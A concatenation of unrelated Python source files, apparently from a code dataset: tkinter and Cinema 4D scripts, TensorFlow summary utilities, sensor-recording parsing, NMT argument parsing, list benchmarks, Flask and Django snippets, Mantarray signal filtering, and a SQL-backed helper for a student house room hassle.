# -*- coding: UTF-8 -*- # ------------------------(max to 80 columns)----------------------------------- # author by : (学员ID) # created: 2019.11 # Description: # 初步学习 WinForm 编程 ( Listbox ) # ------------------------(max to 80 columns)----------------------------------- import tkinter as tk from tkinter import ttk # create root window top_win = tk.Tk() # naming root window top_win.title('Hello World Window') # resize root window win_size_pos = '800x600' #win_size_pos = '360x60' top_win.geometry(win_size_pos) ''' selectmode 判断多少项目可以选择,鼠标拖动如何影响选择: BROWSE: 通常情况下,你只能选择一条线,一个ListBox。 如果您单击一个项目,然后拖动到不同的线路,选择将跟随鼠标。这是默认. SINGLE: 你只能选择一条线,你可以拖不mouse.wherever的您单击按钮1,该行被选中. MULTIPLE: 你可以选择任何的行数一次。点击任何行切换是否被选中. EXTENDED: 你可以选择任何一次行相邻组的第一行上点击并拖动到最后一行. ''' sb = tk.Scrollbar(top_win) sb.place(x=60, y=20, height=500) lb = tk.Listbox(top_win, selectmode=tk.BROWSE, yscrollcommand=sb.set) for i in range(50): lb.insert('end', '%03d' % i) #lb.pack(side='left', fill='both') lb.place(x=20, y=20, width=40, height=500) # connect sb & lb sb.config(command=lb.yview) # show window and get into event loop top_win.mainloop()
StarcoderdataPython
1696743
""" Copyright: MAXON Computer GmbH Author: <NAME> Description: - Hides the objects of the active LOD object 'op' current level. Class/method highlighted: - LodObject.GetCurrentLevel() - LodObject.GetShowControlDescID() Compatible: - Win / Mac - R19, R20, R21, S22 """ import c4d def main(): # Checks if there is an active object if not op: return # Checks if active object is a LOD object if not op.CheckType(c4d.Olod): return # Gets active LOD object current level currentLevel = op.GetCurrentLevel() # Hides current level showControlID = op.GetShowControlDescID(currentLevel) if showControlID is not None: op[showControlID] = False # Pushes an update event to Cinema 4D c4d.EventAdd() if __name__ == '__main__': main()
StarcoderdataPython
1683472
<reponame>dhzzy88/Bike2Car<gh_stars>1-10 # -*- coding: UTF-8 -*- # File: summary.py import six import tensorflow as tf import re import io from six.moves import range from contextlib import contextmanager from tensorflow.python.training import moving_averages from ..utils import logger from ..utils.develop import log_deprecated from ..utils.argtools import graph_memoized from ..utils.naming import MOVING_SUMMARY_OPS_KEY from .tower import get_current_tower_context from .symbolic_functions import rms from .scope_utils import cached_name_scope __all__ = ['add_tensor_summary', 'add_param_summary', 'add_activation_summary', 'add_moving_summary'] # some scope stuff to use internally... @graph_memoized def _get_cached_vs(name): with tf.variable_scope(name) as scope: return scope @contextmanager def _enter_vs_reuse_ns(name): vs = _get_cached_vs(name) # XXX Not good to enter the cached vs directly, because this will clean-up custom getter # with tf.variable_scope(name, reuse=tf.AUTO_REUSE): # available in 1.4 only with tf.variable_scope(vs): with tf.name_scope(vs.original_name_scope): yield vs def create_scalar_summary(name, v): """ Args: name (str): v (float): scalar value Returns: tf.Summary: a tf.Summary object with name and simple scalar value v. """ assert isinstance(name, six.string_types), type(name) v = float(v) s = tf.Summary() s.value.add(tag=name, simple_value=v) return s def create_image_summary(name, val): """ Args: name(str): val(np.ndarray): 4D tensor of NHWC. assume RGB if C==3. Can be either float or uint8. Range has to be [0,255]. Returns: tf.Summary: """ assert isinstance(name, six.string_types), type(name) n, h, w, c = val.shape val = val.astype('uint8') s = tf.Summary() for k in range(n): arr = val[k] if arr.shape[2] == 1: # scipy doesn't accept (h,w,1) arr = arr[:, :, 0] tag = name if n == 1 else '{}/{}'.format(name, k) buf = io.BytesIO() # scipy assumes RGB scipy.misc.toimage(arr).save(buf, format='png') img = tf.Summary.Image() img.height = h img.width = w # 1 - grayscale 3 - RGB 4 - RGBA img.colorspace = c img.encoded_image_string = buf.getvalue() s.value.add(tag=tag, image=img) return s def add_tensor_summary(x, types, name=None, collections=None, main_tower_only=True): """ Summarize a tensor by different methods. Args: x (tf.Tensor): a tensor to summarize types (list[str]): summary types, can be scalar/histogram/sparsity/mean/rms name (str): summary name. Defaults to be the op name. collections (list[str]): collections of the summary ops. main_tower_only (bool): Only run under main training tower. If set to True, calling this function under other TowerContext has no effect. Examples: .. code-block:: python with tf.name_scope('mysummaries'): # to not mess up tensorboard add_tensor_summary( tensor, ['histogram', 'rms', 'sparsity'], name='mytensor') """ types = set(types) if name is None: name = x.op.name ctx = get_current_tower_context() if ctx is not None and not ctx.is_main_training_tower: return SUMMARY_TYPES_DIC = { 'scalar': lambda: tf.summary.scalar(name + '-summary', x, collections=collections), 'histogram': lambda: tf.summary.histogram(name + '-histogram', x, collections=collections), 'sparsity': lambda: tf.summary.scalar( name + '-sparsity', tf.nn.zero_fraction(x), collections=collections), 'mean': lambda: tf.summary.scalar( name + '-mean', tf.reduce_mean(x), collections=collections), 'rms': lambda: tf.summary.scalar( name + '-rms', rms(x), collections=collections) } for typ in types: SUMMARY_TYPES_DIC[typ]() def add_activation_summary(x, types=None, name=None, collections=None): """ Call :func:`add_tensor_summary` under a reused 'activation-summary' name scope. This function is a no-op if not calling from main training tower. Args: x (tf.Tensor): the tensor to summary. types (list[str]): summary types, defaults to ``['sparsity', 'rms', 'histogram']``. name (str): if is None, use x.name. collections (list[str]): collections of the summary ops. """ ndim = x.get_shape().ndims if ndim < 2: logger.warn("Cannot summarize scalar activation {}".format(x.name)) return if types is None: types = ['sparsity', 'rms', 'histogram'] with cached_name_scope('activation-summary'): add_tensor_summary(x, types, name=name, collections=collections) def add_param_summary(*summary_lists, **kwargs): """ Add summary ops for all trainable variables matching the regex, under a reused 'param-summary' name scope. This function is a no-op if not calling from main training tower. Args: summary_lists (list): each is (regex, [list of summary type]). Summary type is defined in :func:`add_tensor_summary`. collections (list[str]): collections of the summary ops. Examples: .. code-block:: python add_param_summary( ('.*/W', ['histogram', 'rms']), ('.*/gamma', ['scalar']), ) """ collections = kwargs.pop('collections', None) assert len(kwargs) == 0, "Unknown kwargs: " + str(kwargs) ctx = get_current_tower_context() if ctx is not None and not ctx.is_main_training_tower: return params = tf.get_collection(tf.GraphKeys.TRAINABLE_VARIABLES) with cached_name_scope('param-summary'): for p in params: name = p.op.name for rgx, actions in summary_lists: if not rgx.endswith('$'): rgx = rgx + '$' if re.match(rgx, name): add_tensor_summary(p, actions, name=name, collections=collections) def add_moving_summary(*args, **kwargs): """ Add moving average summary for some tensors. This function is a no-op if not calling from main training tower. Args: args: tensors to summarize decay (float): the decay rate. Defaults to 0.95. collection (str or None): the name of the collection to add EMA-maintaining ops. The default will work together with the default :class:`MovingAverageSummary` callback. Returns: [tf.Tensor]: list of tensors returned by assign_moving_average, which can be used to maintain the EMA. """ decay = kwargs.pop('decay', 0.95) coll = kwargs.pop('collection', MOVING_SUMMARY_OPS_KEY) assert len(kwargs) == 0, "Unknown arguments: " + str(kwargs) ctx = get_current_tower_context() # allow ctx to be none if ctx is not None and not ctx.is_main_training_tower: return [] if tf.get_variable_scope().reuse is True: logger.warn("add_moving_summary() called under reuse=True scope, ignored.") return [] if not isinstance(args[0], list): v = args else: log_deprecated("Call add_moving_summary with positional args instead of a list!", eos="2018-02-28") v = args[0] for x in v: assert isinstance(x, (tf.Tensor, tf.Variable)), x assert x.get_shape().ndims == 0, \ "add_moving_summary() only accepts scalar tensor! Got one with {}".format(x.get_shape()) G = tf.get_default_graph() # TODO variable not saved under distributed ema_ops = [] for c in v: name = re.sub('tower[0-9]+/', '', c.op.name) # TODO colocate may affect distributed setting # colocate variable with compute op implies that the variable should be local_vars with G.colocate_with(c), tf.name_scope(None): if not c.dtype.is_floating: c = tf.cast(c, tf.float32) # assign_moving_average creates variables with op names, therefore clear ns first. with _enter_vs_reuse_ns('EMA') as vs: ema_var = tf.get_variable(name, shape=c.shape, dtype=c.dtype, initializer=tf.constant_initializer(), trainable=False) ns = vs.original_name_scope with tf.name_scope(ns): # reuse VS&NS so that EMA_1 won't appear ema_op = moving_averages.assign_moving_average( ema_var, c, decay, zero_debias=True, name=name + '_EMA_apply') ema_ops.append(ema_op) with tf.name_scope(None): # cannot add it into colocate group -- will force everything to cpus tf.summary.scalar(name + '-summary', ema_op) # write the EMA value as a summary if coll is not None: for op in ema_ops: # TODO a new collection to summary every step? tf.add_to_collection(coll, op) return ema_ops try: import scipy.misc except ImportError: from ..utils.develop import create_dummy_func create_image_summary = create_dummy_func('create_image_summary', 'scipy.misc') # noqa
StarcoderdataPython
120290
import os import glob import csv import pandas as pd import numpy as np from collections import deque from itertools import chain from utils import rotate_quat, rotate_cross_product class Sensor(object): def __init__(self, name, fieldnames, data): self.name = name self.fieldnames = fieldnames self.raw_data = data self.length = data[-1, 0] - data[0, 0] def __str__(self): return '<Sensor "{}">'.format(self.name) def __repr__(self): return str(self) def __getitem__(self, key): if isinstance(key, tuple): keys = [self.fieldnames.index(k) for k in key] else: keys = self.fieldnames.index(key) return self.raw_data[:, keys] class Recording(object): def __init__(self, path, step_stride_threshold=300): self.path = path self.sensors = [] self.subject = 'unknown' sensors_i = (p for p in glob.iglob(os.path.join(path, '*.csv')) if '-extra' not in p) for sensor_log in sensors_i: sensor_name = os.path.splitext(os.path.split(sensor_log)[-1])[0] with open(sensor_log) as f: reader = csv.reader(f) try: fieldnames = next(reader) except StopIteration: continue data = np.array([self._parse_line(fieldnames, l) for l in reader]) try: sensor = Sensor(sensor_name, fieldnames, data) except IndexError: print('Error: Empty sensor {}'.format(sensor_log)) else: setattr(self, sensor_name, sensor) self.sensors.append(sensor) if self.foot_sensors_available: self.filter_steps(step_stride_threshold) else: print('Warning: Not all foot sensors available') with open(os.path.join(path, 'meta.txt')) as f: lines = f.readlines() for l in lines: if l.startswith('now'): self.recording_start = int(l.split(' ')[-1]) * 1e-9 elif l.startswith('name'): self.subject = l.split(' ')[-1].strip() def _parse_line(self, fieldnames, l): assert len(fieldnames) == len(l), f'_parse_line({fieldnames}, {l})' for i in range(len(l)): if fieldnames[i].endswith('_ts'): value = int(l[i]) * 1e-9 elif fieldnames[i].startswith('is_') or fieldnames[i] == 'running': value = l[i] == 'true' else: value = float(l[i]) l[i] = value return l def __str__(self): return '<{} "{}" raw-sensors={}>'.format( os.path.split(self.path)[-1], self.condition, [s.name for s in self.sensors]) def __repr__(self): return str(self) def write(self, file_name): # sensors = {s.name: s.raw_data for s in self.sensors} # sensors['merged'] = self.merged # np.savez_compressed(os.path.join(self.path, file_name), # **sensors) self.merged.to_msgpack(os.path.join(self.path, file_name)) def merge(self, step_margin=1.): data_sensors = self.data_sensors arrivals = [s['arrival_ts'] for s in data_sensors] idc = [0] * len(data_sensors) qs = [deque(maxlen=1) for _ in data_sensors] result = deque() try: while True: # fill queues with newest data point new_arr = [s[idc[i]] for i, s in enumerate(arrivals)] newest = np.argmin(new_arr) qs[newest].append(data_sensors[newest].raw_data[idc[newest]]) idc[newest] += 1 # check if all queues contain data if all([len(q) > 0 for q in qs]): # create new data point containing all sensor data # assign average timestamp avg_timestamp = np.mean([q[0][0] for q in qs]) label = self.label_for_timestamp(avg_timestamp, step_margin) data = [avg_timestamp, label] # append sensor data: data fields [2:6] data += list(chain(*(q.popleft()[2:6] for q in qs))) result.append(data) except IndexError: pass cols = ['event_ts', 'label'] for s in data_sensors: cols += ['{}_{}'.format(s.name, fn) for fn in s.fieldnames[2:6]] self.merged = pd.DataFrame.from_records(list(result), columns=cols) @property def data_sensors(self): label_sensor_names = ('RightFootSensor', 'LeftFootSensor') return [s for s in self.sensors if s.name not in label_sensor_names and '-extra' not in s.name] @property def foot_sensors_available(self): return hasattr(self, 'RightFootSensor') and hasattr(self, 'LeftFootSensor') def label_for_timestamp(self, timestamp, step_margin=1.): '''TODO DOCS''' if not self.foot_sensors_available: return False for s in (self.RightFootSensor, self.LeftFootSensor): arrivals = s['arrival_ts'] ts_idx = np.searchsorted(arrivals, timestamp) step_durations = s['duration'] * 1e-3 if ts_idx < step_durations.shape[0]: step_start_ts = arrivals[ts_idx] - step_durations[ts_idx] - step_margin # print(arrivals[ts_idx + 1], step_durations[ts_idx + 1], step_start_ts, timestamp) if timestamp >= step_start_ts: # print('in') # step_start_ts <= timestamp <= step_arrival return True return False def rotate_accelerometer(self): acc = self.merged.as_matrix(['Accelerometer_val_x', 'Accelerometer_val_y', 'Accelerometer_val_z']) rot = self.merged.as_matrix(['GameRotationVector_val_w', 'GameRotationVector_val_x', 'GameRotationVector_val_y', 'GameRotationVector_val_z']) if np.isnan(rot).any(): print('WARNING: GameRotationVector data unavailable. Fallback to RotationVector.') rot = self.merged.as_matrix(['RotationVector_val_w', 'RotationVector_val_x', 'RotationVector_val_y', 'RotationVector_val_z']) if np.isnan(rot).any(): raise ValueError('No RotationVector data available. Cannot rotate accelerometer.') keys = 'Rotated_Accelerometer_val_x', 'Rotated_Accelerometer_val_y', 'Rotated_Accelerometer_val_z' rot_acc = rotate_quat(acc, rot) self.merged = self.merged.assign(**{keys[i]: rot_acc[:, i] for i in range(len(keys))}) def normalize_accelerometer(self, norm_reference): acc = self.merged.as_matrix(['Accelerometer_val_x', 'Accelerometer_val_y', 'Accelerometer_val_z']) rot = self.merged.as_matrix(['GameRotationVector_val_w', 'GameRotationVector_val_x', 'GameRotationVector_val_y', 'GameRotationVector_val_z']) if np.isnan(rot).any(): print('WARNING: GameRotationVector data unavailable. Fallback to RotationVector.') rot = self.merged.as_matrix(['RotationVector_val_w', 'RotationVector_val_x', 'RotationVector_val_y', 'RotationVector_val_z']) if np.isnan(rot).any(): raise ValueError('No RotationVector data available. Cannot rotate accelerometer.') keys = 'Normalized_Accelerometer_val_x', 'Normalized_Accelerometer_val_y', 'Normalized_Accelerometer_val_z' rot_acc = rotate_quat(acc, rot) rot_acc[:, 2] -= 9.8 rot_acc /= norm_reference self.merged = self.merged.assign(**{keys[i]: rot_acc[:, i] for i in range(len(keys))}) def filter_steps(self, th): for s in (self.RightFootSensor, self.LeftFootSensor): step_data = s['stride_x', 'stride_y'] step_norm = np.linalg.norm(step_data, axis=1) print('{}: {} steps detected as too small'.format(s.name, np.sum(step_norm < th))) s.raw_data = s.raw_data[step_norm >= th]
StarcoderdataPython
140115
<filename>scripts/args.py<gh_stars>0 """ Module for argument parcer. Many of the arguments are from Huggingface's run_squad example: https://github.com/huggingface/transformers/blob/7972a4019f4bc9f85fd358f42249b90f9cd27c68/examples/run_squad.py """ import argparse import os args = argparse.ArgumentParser(description='nmt translation') args.add_argument('--experiment', type=str, default='testing', help='name of experiment') args.add_argument('--save_dir', type=str, default='results', help='directory to save results') args.add_argument('--plots_dir', type=str, default='plot', help='directory to save results') args.add_argument('--seed', type=int, default=42, help='random seed') args.add_argument('--run_log', type=str, default=os.path.join(os.getcwd(),'log'), help='where to print run log') args.add_argument('--access_mode', type=int, default=0o777, help='access mode of files created') # ============================================================================= # for dataloading # ============================================================================= args.add_argument('--data_dir', type=str, default='data', help='directory storing all data') args.add_argument('--batch_size', type=int, default=8, help='batch size') # args.add_argument('--longest_label', # type=int, # default=1, # help='longest label') args.add_argument('--source_name', type=str, default='vi', help='source language name') args.add_argument('--target_name', type=str, default='en', help='target language name') # ============================================================================= # for training # ============================================================================= args.add_argument('--learning_rate', type=float, default=0.25, help='initial learning rate') args.add_argument('--logging_steps', type=int, default=1e4, help='logs best weights every X update steps for experiment') args.add_argument('--optimizer', type=str, default='sgd', help='specify what type of optimizer to use for training ("sgd","adam")') # args.add_argument('--hidden_size', # type=int, # default=512, # help='hidden size of RNN') args.add_argument('--enc_emb', type=int, default=512, help='encoder embedding dim') args.add_argument('--enc_hidden', type=int, default=512, help='encoder hidden size') args.add_argument('--enc_layers', type=int, default=1, help='encoder num layers') args.add_argument('--rnn_type', type=str, default='lstm', help='rnn type (lstm or gru)') args.add_argument('--dec_emb', type=int, default=512, help='decoder embedding dim') args.add_argument('--dec_hidden', type=int, default=1024, help='decoder hidden size') args.add_argument('--dec_layers', type=int, default=1, help='decoder num layers') # args.add_argument('--rnn_layers', # type=int, # default=1, # help='num layers of RNN') # args.add_argument('--gradient_clip', # type=float, # default=0.3, # help='num layers of RNN') args.add_argument('--epochs', type=int, default=10, help='number of epochs') args.add_argument('--attn', action='store_true', help='with decoder attention') args.add_argument('--wo_attn', action='store_false', help='without decoder attention') args.add_argument('--beam_size', type=int, default=3, help='beam size for eval') def check_args(parser): """ make sure directories exist """ assert os.path.exists(parser.data_dir), "Data directory does not exist" assert os.path.exists(parser.save_dir), "Save directory does not exist" assert os.path.exists(parser.run_log), "Run logging directory does not exist"
StarcoderdataPython
3359533
<filename>pybench/Lists.py # Ignore flake8 E741 warning in the whole file: # flake8: noqa import pyperf from six.moves import xrange from pybench import Test class SimpleListManipulation(Test): version = 2.0 operations = 5 * (6 + 6 + 6) inner_loops = 5 def test(self, loops): l = [] append = l.append range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] x = l[1] x = l[2] x = l[3] x = l[4] x = l[5] append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 x = l[0] # noqa x = l[1] # noqa x = l[2] # noqa x = l[3] # noqa x = l[4] # noqa x = l[5] # noqa if len(l) > 10000: # cut down the size del l[:] return pyperf.perf_counter() - t0 class ListSlicing(Test): version = 2.0 operations = 25 * (3 + 1 + 2 + 1) def test(self, loops): n = list(range(100)) r = list(range(25)) range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = n[:] for j in r: m = l[50:] # noqa m = l[:25] # noqa m = l[50:55] # noqa l[:3] = n # noqa m = l[:-1] # noqa m = l[1:] # noqa l[-1:] = n # noqa return pyperf.perf_counter() - t0 class SmallLists(Test): version = 2.0 operations = 5 * (1 + 6 + 6 + 3 + 1) inner_loops = 5 def test(self, loops): range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] l[-1:] = [4, 5, 6] l = [] append = l.append append(2) append(3) append(4) append(2) append(3) append(4) l[0] = 3 l[1] = 4 l[2] = 5 l[3] = 3 l[4] = 4 l[5] = 5 l[:3] = [1, 2, 3] m = l[:-1] m = l[1:] # noqa l[-1:] = [4, 5, 6] return pyperf.perf_counter() - t0 class SimpleListComprehensions(Test): version = 2.0 operations = 6 inner_loops = 2 def test(self, loops): n = list(range(10)) * 10 range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = [x for x in n] l = [x for x in n if x] l = [x for x in n if not x] l = [x for x in n] l = [x for x in n if x] l = [x for x in n if not x] # noqa return pyperf.perf_counter() - t0 class NestedListComprehensions(Test): version = 2.0 operations = 6 def test(self, loops): m = list(range(10)) n = list(range(10)) range_it = xrange(loops) t0 = pyperf.perf_counter() for _ in range_it: l = [x for x in n for y in m] l = [y for x in n for y in m] l = [x for x in n for y in m if y] l = [y for x in n for y in m if x] l = [x for x in n for y in m if not y] l = [y for x in n for y in m if not x] # noqa return pyperf.perf_counter() - t0
StarcoderdataPython
19747
from flask.ext.wtf import Form from wtforms import ( TextField, IntegerField, HiddenField, SubmitField, validators ) class MonkeyForm(Form): id = HiddenField() name = TextField('Name', validators=[validators.InputRequired()]) age = IntegerField( 'Age', validators=[ validators.InputRequired(message='Age should be an integer.'), validators.NumberRange(min=0) ] ) email = TextField( 'Email', validators=[validators.InputRequired(), validators.Email()] ) submit_button = SubmitField('Submit')
StarcoderdataPython
72476
<gh_stars>1-10 from django.apps import AppConfig class OficinaConfig(AppConfig): name = 'oficina'
StarcoderdataPython
3349471
# -*- coding: utf-8 -*- """Transforming arrays of Mantarray data throughout the analysis pipeline.""" from typing import Any from typing import Dict from typing import List from typing import Union import uuid from nptyping import NDArray import numpy as np from scipy import signal from .constants import ADC_GAIN from .constants import BESSEL_BANDPASS_UUID from .constants import BESSEL_LOWPASS_10_UUID from .constants import BESSEL_LOWPASS_30_UUID from .constants import BUTTERWORTH_LOWPASS_30_UUID from .constants import MICRO_TO_BASE_CONVERSION from .constants import MILLI_TO_BASE_CONVERSION from .constants import MILLIMETERS_PER_MILLITESLA from .constants import MILLIVOLTS_PER_MILLITESLA from .constants import NEWTONS_PER_MILLIMETER from .constants import RAW_TO_SIGNED_CONVERSION_VALUE from .constants import REFERENCE_VOLTAGE from .exceptions import FilterCreationNotImplementedError from .exceptions import UnrecognizedFilterUuidError FILTER_CHARACTERISTICS: Dict[uuid.UUID, Dict[str, Union[str, float, int]]] = { BESSEL_BANDPASS_UUID: { "filter_type": "bessel", "order": 4, "high_pass_hz": 0.1, "low_pass_hz": 10, }, BESSEL_LOWPASS_10_UUID: {"filter_type": "bessel", "order": 4, "low_pass_hz": 10}, BESSEL_LOWPASS_30_UUID: {"filter_type": "bessel", "order": 4, "low_pass_hz": 30}, BUTTERWORTH_LOWPASS_30_UUID: { "filter_type": "butterworth", "order": 4, "low_pass_hz": 30, }, } def create_filter( filter_uuid: uuid.UUID, sample_period_microseconds: int, ) -> NDArray[(Any, Any), float]: """Create a filter to apply to data streams. Args: filter_uuid: a UUID of an already accepted and approved filter sample_period_microseconds: the sampling period for the data stream you want to apply the filter to Returns: The scipy 'b' and 'a' vectors to use in scipy.signal.filtfilt """ sampling_frequency_hz = 1 / (sample_period_microseconds / MICRO_TO_BASE_CONVERSION) nyquist_frequency_limit = sampling_frequency_hz / 2 if filter_uuid not in FILTER_CHARACTERISTICS: raise UnrecognizedFilterUuidError(filter_uuid) the_filter_characteristics = FILTER_CHARACTERISTICS[filter_uuid] normalized_high_pass_frequency: Union[int, float] normalized_low_pass_frequency: Union[int, float] filter_order: int if "order" in the_filter_characteristics: if not isinstance(the_filter_characteristics["order"], int): raise NotImplementedError("The filter order must always be an int.") filter_order = the_filter_characteristics["order"] pass_boundaries: List[Union[float, int]] = list() bandpass_type = "lowpass" # by default if "high_pass_hz" in the_filter_characteristics: if isinstance(the_filter_characteristics["high_pass_hz"], str): raise NotImplementedError("The high pass frequency should never be a string.") normalized_high_pass_frequency = the_filter_characteristics["high_pass_hz"] / nyquist_frequency_limit pass_boundaries.append(normalized_high_pass_frequency) if "low_pass_hz" in the_filter_characteristics: if isinstance(the_filter_characteristics["low_pass_hz"], str): raise NotImplementedError("The low pass frequency should never be a string.") normalized_low_pass_frequency = the_filter_characteristics["low_pass_hz"] / nyquist_frequency_limit pass_boundaries.append(normalized_low_pass_frequency) if len(pass_boundaries) == 2: bandpass_type = "bandpass" filter_type = the_filter_characteristics["filter_type"] if filter_type == "bessel": sos_polys = signal.bessel(filter_order, pass_boundaries, btype=bandpass_type, output="sos") elif filter_type == "butterworth": sos_polys = signal.butter(filter_order, pass_boundaries, btype=bandpass_type, output="sos") else: raise FilterCreationNotImplementedError(filter_uuid) if not isinstance(sos_polys, NDArray[float]): raise NotImplementedError("Returned polynomials most be float arrays") return sos_polys def apply_sensitivity_calibration(raw_gmr_reading: NDArray[(2, Any), int]) -> NDArray[(2, Any), int]: """Apply the result of a sensor sensitivity calibration. Actual sensitivity calibration will be performed once information obtained from Jason. Args: raw_gmr_reading: an original 2d array of time vs GMR readings. Could be from tissue construct or reference sensor. Returns: A 2d array of the time vs GMR readings after sensitivity calibration. Data will be rounded to integers if calibration results in slight decimal behavior. """ return raw_gmr_reading def noise_cancellation( tissue_gmr_reading: NDArray[(2, Any), int], reference_gmr_reading: NDArray[ (2, Any), int ], # pylint: disable=unused-argument # this will eventually be used ) -> NDArray[(2, Any), int]: """Perform cancellation of ambient magnetic noise using reference sensor. This should be performed after sensitivity calibration has been applied to the raw data from each sensor. Args: tissue_gmr_reading: from the tissue construct sensor reference_gmr_reading: from the reference sensor Returns: A single 2D array of time vs GMR reading. """ return tissue_gmr_reading def apply_empty_plate_calibration( noise_cancelled_gmr: NDArray[(2, Any), int], ) -> NDArray[(2, Any), int]: """Apply the result of an empty plate calibration. Actual empty plate calibration will be performed once information obtained from Jason. Args: noise_cancelled_gmr: an 2D array of Time and GMR readings after combining reference and tissue sensor readings. Returns: A 2D array of the Time and GMR readings after empty plate calibration. Data will be rounded to integers if calibration results in slight decimal behavior. """ return noise_cancelled_gmr def apply_noise_filtering( fully_calibrated_gmr: NDArray[(2, Any), int], scipy_filter_sos_coefficients: NDArray[(Any, Any), float], ) -> NDArray[(2, Any), int]: """Apply the result of an empty plate calibration. Actual empty plate calibration will be performed once information obtained from Jason. Args: fully_calibrated_gmr: an 2D array of Time and GMR readings after applying the Empty Plate calibration. scipy_filter_sos_coefficients: The 'second order system' coefficient array that scipy filters generate when created Returns: A 2D array of the Time and GMR readings after empty plate calibration. Data will be rounded to integers if calibration results in slight decimal behavior. """ time_readings = fully_calibrated_gmr[0, :] gmr_readings = fully_calibrated_gmr[1, :] float_array = signal.sosfiltfilt(scipy_filter_sos_coefficients, gmr_readings) int_array = np.rint(float_array).astype(np.int32) filtered_data: NDArray[(2, Any), int] = np.vstack((time_readings, int_array)) return filtered_data def calculate_voltage_from_gmr( gmr_data: NDArray[(2, Any), int], reference_voltage: Union[float, int] = REFERENCE_VOLTAGE, adc_gain: int = ADC_GAIN, ) -> NDArray[(2, Any), np.float64]: """Convert 'signed' 24-bit values from an ADC to measured voltage. Conversion values were obtained 03/09/2021 by <NAME> Args: gmr_data: time and GMR numpy array. Typically coming from filtered_gmr_data reference_voltage: Almost always leave as default of 2.5V adc_gain: Current implementation of Mantarray is constant value of 2, but may change in the future Returns: A 2D array of time vs Voltage """ millivolts_per_lsb = 1000 * reference_voltage / RAW_TO_SIGNED_CONVERSION_VALUE sample_in_millivolts = gmr_data[1, :].astype(np.float64) * millivolts_per_lsb * (1 / adc_gain) sample_in_volts = sample_in_millivolts / MILLI_TO_BASE_CONVERSION return np.vstack((gmr_data[0, :].astype(np.float64), sample_in_volts)) def calculate_displacement_from_voltage( voltage_data: NDArray[(2, Any), np.float64], ) -> NDArray[(2, Any), np.float64]: """Convert voltage to displacement. Conversion values were obtained 03/09/2021 by <NAME> Args: voltage_data: time and Voltage numpy array. Typically coming from calculate_voltage_from_gmr Returns: A 2D array of time vs Displacement (meters) """ sample_in_millivolts = voltage_data[1, :] * MILLI_TO_BASE_CONVERSION time = voltage_data[0, :] # calculate magnetic flux density sample_in_milliteslas = sample_in_millivolts / MILLIVOLTS_PER_MILLITESLA # calculate displacement sample_in_millimeters = sample_in_milliteslas * MILLIMETERS_PER_MILLITESLA sample_in_meters = sample_in_millimeters / MILLI_TO_BASE_CONVERSION return np.vstack((time, sample_in_meters)).astype(np.float64) def calculate_force_from_displacement( displacement_data: NDArray[(2, Any), np.float64], in_mm: bool = True, ) -> NDArray[(2, Any), np.float64]: """Convert displacement to force. Conversion values were obtained 03/09/2021 by <NAME> Args: displacement_data: time and Displacement numpy array. Typically coming from calculate_displacement_from_voltage or the magnet finding alg in_mm: whether this data is in units of mm or not. If coming from calculate_displacement_from_voltage, it is likely in meters and this value should be set to True Returns: A 2D array of time vs Force (Newtons) """ displacement = displacement_data[1, :] if not in_mm: displacement *= MILLI_TO_BASE_CONVERSION time = displacement_data[0, :] # calculate force sample_in_newtons = displacement * NEWTONS_PER_MILLIMETER return np.vstack((time, sample_in_newtons)).astype(np.float64)
StarcoderdataPython
3366734
<filename>ruddock/modules/hassle/helpers.py import flask import sqlalchemy alleys = [1, 2, 3, 4, 5, 6] def get_all_members(): """Gets all current members (potential hassle participants).""" query = sqlalchemy.text(""" SELECT user_id, name, graduation_year, member_type, membership_desc, user_id IN ( SELECT user_id FROM hassle_participants ) AS participating FROM members NATURAL JOIN members_extra NATURAL JOIN members_current NATURAL JOIN membership_types ORDER BY member_type, graduation_year, name """) return flask.g.db.execute(query).fetchall() def get_rising_members(): """Gets IDs for all current frosh, sophomores, and juniors.""" query = sqlalchemy.text(""" SELECT user_id FROM members NATURAL JOIN members_current WHERE member_type = 1 AND CONCAT(graduation_year, '-07-01') > NOW() + INTERVAL 1 YEAR """) return flask.g.db.execute(query).fetchall() def get_frosh(): """Gets IDs for all current frosh.""" query = sqlalchemy.text(""" SELECT user_id FROM members NATURAL JOIN members_current WHERE member_type = 1 AND CONCAT(graduation_year, '-07-01') > NOW() + INTERVAL 3 YEAR """) return flask.g.db.execute(query).fetchall() def get_participants(): """Gets all members participating in the hassle.""" query = sqlalchemy.text(""" SELECT user_id, name, graduation_year, member_type, membership_desc 